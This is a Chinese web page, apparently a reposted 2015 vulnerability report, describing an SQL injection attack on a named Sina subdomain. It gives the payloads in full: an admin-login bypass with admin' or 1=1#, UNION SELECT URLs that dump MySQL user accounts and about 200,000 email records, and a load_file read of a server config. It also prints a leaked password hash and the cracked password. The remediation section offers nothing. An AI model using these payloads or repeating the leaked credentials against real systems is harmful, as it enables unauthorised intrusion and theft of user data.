网站地图    收藏   

主页 > 后端 > 网站安全 >

新浪子域名后台sql注射引发的血案 - 网站安全

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 后台直接用admin#39;or 1=1# 登陆 找到注入点MYSQL外连详细说明:目标站http://bes.sina.net进入后台 竟然还要账号密码。。开什么玩笑直接用户名admin#39; or 1=1#密码随意写123456 成功登陆ok点来点...

后台直接用admin'or 1=1# 登陆 找到注入点MYSQL外连
详细说明:目标站http://bes.sina.net
进入后台 竟然还要账号密码。。开什么玩笑
直接用户名admin' or 1=1#
密码随意写123456 成功登陆
 
ok
点来点去 找到个注入点http://bes.sina.net/content_detail.php?content_id=199
之后
http://bes.sina.net/content_detail.php?content_id=199 and 1=2 union all selEct group_concat(DISTINCT+user,0x3a,password,0x3a,file_priv,0x3a,host),2,3,4,5,6 from+mysql.user--
 
yaoya:*B30D63E3C0BEE74D8A017AD371EB8810F01093CC:Y:%
可以MYSQL外连
破解了MD5
madwolf
成功连上
 
数据库还不少啊
http://bes.sina.net/content_detail.php?content_id=199%20aNd%201=2%20unIon%20all%20selEct%20concat%280x3a,email,0x3a,city,0x3a,login_time,province,ad_login_num,reg_time%29,2,3,4,5,6%20from%20rmail.ad_admin65%20limit%20268994,1%23
20W条邮箱啊。。可惜没密码
其他数据库不解释了
写入一句话不成功啊。。貌似目录没权限
读读配置吧
select load_file('/data0/apache/conf/extra/httpd-vhosts.conf')
 
 
 
完结。。
求证书+礼物啊。。
 
 
漏洞证明:

http://bes.sina.net/content_detail.php?content_id=199 and 1=2 union all selEct group_concat(DISTINCT+user,0x3a,password,0x3a,file_priv,0x3a,host),2,3,4,5,6 from+mysql.user--
 
修复方案:

怎么修复你们懂得

作者 灰太狼

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论